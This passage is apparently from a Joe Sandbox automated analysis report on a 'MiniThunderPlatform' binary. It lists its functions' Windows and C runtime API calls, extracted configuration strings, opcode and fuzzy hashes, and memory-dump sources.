                                                                                                                                              • API ID: FreeTaskVersion$AddressLibraryLoadProcmemsetwcscpywcslen
                                                                                                                                              • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                                                              • API String ID: 1429141912-2936008475
                                                                                                                                              • Opcode ID: d1b8ed3d7d5f8828301b08eabc560b144e0b8a0aceba030aa62a8eab4fecb4be
                                                                                                                                              • Instruction ID: 40fd898d1aef6dd0312774801b55effdd2640996a0e6f2f98d44bd0ee8339355
                                                                                                                                              • Opcode Fuzzy Hash: d1b8ed3d7d5f8828301b08eabc560b144e0b8a0aceba030aa62a8eab4fecb4be
                                                                                                                                              • Instruction Fuzzy Hash: 18014F31604205FFDF69DBA1CC4EB9E7BA5EF14365F508129F501D80A1DFB2EA91EA20
                                                                                                                                              Function 1005C680 Relevance: 13.6, APIs: 9, Instructions: 134fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1005CBA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,00000020,00000024,00000000), ref: 1005CBFD
                                                                                                                                                • Part of subcall function 1005CBA0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1005CC11
                                                                                                                                                • Part of subcall function 1005CBA0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CC27
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1005C6D5
                                                                                                                                              • fopen.MSVCR71(?,1027E7C0), ref: 1005C6FB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000020,00000024,00000000), ref: 1005C712
                                                                                                                                              • fread.MSVCR71(?,00000001,00000001,00000000), ref: 1005C762
                                                                                                                                              • getc.MSVCR71(00000000), ref: 1005C7A4
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 1005C7D8
                                                                                                                                              • fclose.MSVCR71(00000000), ref: 1005C7F9
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C80E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C823
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??$?8??0?$basic_string@D@1@@std@@D@2@@0@V?$basic_string@$??4?$basic_string@V01@fclosefopenfreadgetc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1129157471-0
                                                                                                                                              • Opcode ID: 453e60a8e93f37fe1e268c0121e1c355fb513e1b3bf372eb74b26329953307d7
                                                                                                                                              • Instruction ID: baf83c83f94484c1d2866acb306b3f02caf3edcd32b72ebf64701c488e90f38c
                                                                                                                                              • Opcode Fuzzy Hash: 453e60a8e93f37fe1e268c0121e1c355fb513e1b3bf372eb74b26329953307d7
                                                                                                                                              • Instruction Fuzzy Hash: B041C07040C3898FD720CF28C888B9ABBE8EB89744F404B5DF99686552D774984DCBA7
                                                                                                                                              Function 1013BC40 Relevance: 13.6, APIs: 9, Instructions: 111networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL ref: 1013BC76
                                                                                                                                              • recvfrom.WS2_32(?,?,?,00000000,?,76105E10), ref: 1013BCB7
                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 1013BD1A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000000), ref: 1013BD29
                                                                                                                                              • htons.WS2_32(?), ref: 1013BD45
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1013BD60
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(10304E30), ref: 1013BD7F
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 1013BDA5
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(10304E30), ref: 1013BDB0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$D@2@@std@@D@std@@LeaveU?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@EnterErrorLasthtonsinet_ntoarecvfrom
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3988946783-0
                                                                                                                                              • Opcode ID: 80da3f1bef030d0e230fe6a1e278386f2f1f5cf6eaba33b4ccc2a5b577c00543
                                                                                                                                              • Instruction ID: f11eda9272dfa321cd544337cbb05ca802c4f3d20dac908532b1b80b9f3e271e
                                                                                                                                              • Opcode Fuzzy Hash: 80da3f1bef030d0e230fe6a1e278386f2f1f5cf6eaba33b4ccc2a5b577c00543
                                                                                                                                              • Instruction Fuzzy Hash: E9418CB11043419FC350DF64C98CB9BBBF9FB88725F408A1DF54A87261EB39A845CB21
                                                                                                                                              Function 1003CB10 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 142networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 1003CBDF
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 1003CBEA
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                                • Part of subcall function 10038CC0: RtlEnterCriticalSection.NTDLL(?), ref: 10038CFA
                                                                                                                                                • Part of subcall function 10038CC0: RtlLeaveCriticalSection.NTDLL(?), ref: 10038D17
                                                                                                                                                • Part of subcall function 10038CC0: ??3@YAXPAX@Z.MSVCR71(?), ref: 10038D53
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@CriticalSection$??3@EnterEnumErrorEventsH_prologLastLeaveNetworkV01@@
                                                                                                                                              • String ID: .\connect_manager.cpp$_connecting_queue.count(event_handle)$_connecting_queue[event_handle]._opt_type == operation_type_connect$socket_handle$thunder_assert
                                                                                                                                              • API String ID: 542771531-4289252589
                                                                                                                                              • Opcode ID: 4551cdc49ceedad96f79ed0166ec5f5f9382e271861b590d33b93e580144a5d4
                                                                                                                                              • Instruction ID: b2910c7472a869938b619ec3702e6980a3c3f4ed1ca157dc4a82d6e856577f9e
                                                                                                                                              • Opcode Fuzzy Hash: 4551cdc49ceedad96f79ed0166ec5f5f9382e271861b590d33b93e580144a5d4
                                                                                                                                              • Instruction Fuzzy Hash: 364119753006086FC211EA259C42E6FB3EDEFD5216F00841DFA4A9B242DB31B915C7B6
                                                                                                                                              Function 00432680 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 004326BC
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(_mini_tpr_e_2013515_360), ref: 004326E6
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(00449980), ref: 00432709
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 0043271B
                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00432731
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00432768
                                                                                                                                              Strings
                                                                                                                                              • _mini_tpr_e_2013515_360, xrefs: 004326DE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$V01@Y?$basic_string@_$??0?$basic_string@_??1?$basic_string@_?data@?$basic_string@_CreateEventV01@@
                                                                                                                                              • String ID: _mini_tpr_e_2013515_360
                                                                                                                                              • API String ID: 1874928642-2919975160
                                                                                                                                              • Opcode ID: 5d8f73b69650695dd343739c33bd3ff33feb6ee042267c5f3a15f6bf93b0d2e6
                                                                                                                                              • Instruction ID: 78b4793443b79c058a6f1eb5f7eb92cdf835383bfe05c3ac2b965819d0ab28fb
                                                                                                                                              • Opcode Fuzzy Hash: 5d8f73b69650695dd343739c33bd3ff33feb6ee042267c5f3a15f6bf93b0d2e6
                                                                                                                                              • Instruction Fuzzy Hash: 92310BB2D00608ABDB10FB69EC82BDCB734EB04314F51422AF515A7281DF785D88C795
                                                                                                                                              Function 00432880 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 004328BC
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(_mini_tpw_e_2013515_360), ref: 004328E6
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(00449980), ref: 00432909
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 0043291B
                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00432931
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00432968
                                                                                                                                              Strings
                                                                                                                                              • _mini_tpw_e_2013515_360, xrefs: 004328DE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$V01@Y?$basic_string@_$??0?$basic_string@_??1?$basic_string@_?data@?$basic_string@_CreateEventV01@@
                                                                                                                                              • String ID: _mini_tpw_e_2013515_360
                                                                                                                                              • API String ID: 1874928642-2643261043
                                                                                                                                              • Opcode ID: ed396f0c04d0e648c75624ac8158b96f56e996524f5c1f8ac0f024e508291cbe
                                                                                                                                              • Instruction ID: 71bd0da44966fa16bd4dca3170b796666badfc362ce22a5c40d5db039aac4969
                                                                                                                                              • Opcode Fuzzy Hash: ed396f0c04d0e648c75624ac8158b96f56e996524f5c1f8ac0f024e508291cbe
                                                                                                                                              • Instruction Fuzzy Hash: 8D3109B2D00608ABDB10FB69EC82BDCBB34EF04314F51422AF515A7281DE786D88C7D9
                                                                                                                                              Function 100113FB Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 82COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • wcslen.MSVCR71(10311B98,00000000,?,00000104), ref: 10011426
                                                                                                                                              • wcslen.MSVCR71(10311B98), ref: 100114AB
                                                                                                                                                • Part of subcall function 1001103C: memset.MSVCR71(?,00000000,00000208,10311990), ref: 10011061
                                                                                                                                                • Part of subcall function 1001103C: GetModuleHandleW.KERNEL32(00000000,?,?,10311990), ref: 1001106B
                                                                                                                                                • Part of subcall function 1001103C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,10311990), ref: 1001107E
                                                                                                                                              • wcscpy.MSVCR71(?,10311B98), ref: 100114BF
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?,7C363127,10311990,00000104,100113A3,?,00000104,uuid), ref: 10010F97
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?), ref: 10010F9F
                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(data,uuid,102780C0,10311B98,00000208,?), ref: 1001147A
                                                                                                                                              • wcslen.MSVCR71(10311B98), ref: 10011481
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcslen$Module$FileHandleNamePrivateProfileStringmemsetwcscpy
                                                                                                                                              • String ID: data$uuid
                                                                                                                                              • API String ID: 1540464159-3828501146
                                                                                                                                              • Opcode ID: 4704a70b496055101460ead90b6b2a52eda3c02ef56d3dada0fb73894f091ebb
                                                                                                                                              • Instruction ID: fe0ddf8f5d50c6b7e26f06fb6508a674f54e25127c7c3ea456b9641da2dd416f
                                                                                                                                              • Opcode Fuzzy Hash: 4704a70b496055101460ead90b6b2a52eda3c02ef56d3dada0fb73894f091ebb
                                                                                                                                              • Instruction Fuzzy Hash: F3216D72A04219AFEB18DB74DC48ADA33ECFF15761F614166F502D7141EB70D9C08B50
                                                                                                                                              Function 10011347 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • wcslen.MSVCR71(10311990,00000000,?,00000104), ref: 10011372
                                                                                                                                              • wcslen.MSVCR71(10311990), ref: 100113CD
                                                                                                                                                • Part of subcall function 1001103C: memset.MSVCR71(?,00000000,00000208,10311990), ref: 10011061
                                                                                                                                                • Part of subcall function 1001103C: GetModuleHandleW.KERNEL32(00000000,?,?,10311990), ref: 1001106B
                                                                                                                                                • Part of subcall function 1001103C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,10311990), ref: 1001107E
                                                                                                                                              • wcscpy.MSVCR71(?,10311990), ref: 100113E1
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?,7C363127,10311990,00000104,100113A3,?,00000104,uuid), ref: 10010F97
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?), ref: 10010F9F
                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(data,path,102780C0,10311990,00000208,?), ref: 100113C6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcslen$Module$FileHandleNamePrivateProfileStringmemsetwcscpy
                                                                                                                                              • String ID: data$path$uuid
                                                                                                                                              • API String ID: 1540464159-3004642934
                                                                                                                                              • Opcode ID: 84a74700854c7b1c3b323c0b95d8a5134303eb2c519dc295133dd85f4bd9ddbb
                                                                                                                                              • Instruction ID: d2dcdeeb5511b574bc6adf411ce7a2885cc00066d69739a114be96e68d662264
                                                                                                                                              • Opcode Fuzzy Hash: 84a74700854c7b1c3b323c0b95d8a5134303eb2c519dc295133dd85f4bd9ddbb
                                                                                                                                              • Instruction Fuzzy Hash: 7A110676901218BFDB24DBA19C8CEDF77ACEF19261F104566F524D7041EBB0DA848A60
                                                                                                                                              Function 10005460 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1000547F
                                                                                                                                              • ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(0123456789,00000000), ref: 1000548F
                                                                                                                                              • init.DOWNLOAD_ENGINE(?), ref: 100054BE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100054D9
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100054E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@?find_first_not_of@?$basic_string@init
                                                                                                                                              • String ID: 0123456789
                                                                                                                                              • API String ID: 4149508285-2793719750
                                                                                                                                              • Opcode ID: a726c3a7553a68533149edb54c6699cb85be66cd927c9c0ad23b477b02d4ec80
                                                                                                                                              • Instruction ID: df0ef7ebbb1aca758f31799fa8d93feeb1d3cae0ac07e890ddac4be97dd5b488
                                                                                                                                              • Opcode Fuzzy Hash: a726c3a7553a68533149edb54c6699cb85be66cd927c9c0ad23b477b02d4ec80
                                                                                                                                              • Instruction Fuzzy Hash: 7A118236900128EBDF14DFA0DC89CEE77B8FF59795B104569F902A3161DB35AA44CBA0
                                                                                                                                              Function 10055950 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100559F4
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(adns_fail_cache,enable,00000000,-00000004), ref: 100559BF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,00000000,10245167,000000FF,10055D61,?,00000000), ref: 100559CD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100559DC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@V01@@$CountH_prologPrivateProfileTickV01@Y?$basic_string@
                                                                                                                                              • String ID: adns_fail_cache$asyn_frame.dat$enable
                                                                                                                                              • API String ID: 2769812439-4188322525
                                                                                                                                              • Opcode ID: 9fb8d7db1125ac8db368738978d10b92828550375e56e411f271c4e4be983e8f
                                                                                                                                              • Instruction ID: 617f04cb637e838367c23d240ac19989483dc2f9dd4ed2081c884e041eb61a33
                                                                                                                                              • Opcode Fuzzy Hash: 9fb8d7db1125ac8db368738978d10b92828550375e56e411f271c4e4be983e8f
                                                                                                                                              • Instruction Fuzzy Hash: 981179785082909FE714DF28CC98B9ABBA8FB99715F00874CF49A862A1D7399405CB62
                                                                                                                                              Function 00437120 Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437158
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00437171
                                                                                                                                              • ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE_NXZ.MSVCP71 ref: 00437197
                                                                                                                                              • ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE_NXZ.MSVCP71 ref: 004371B0
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004371D7
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004371F0
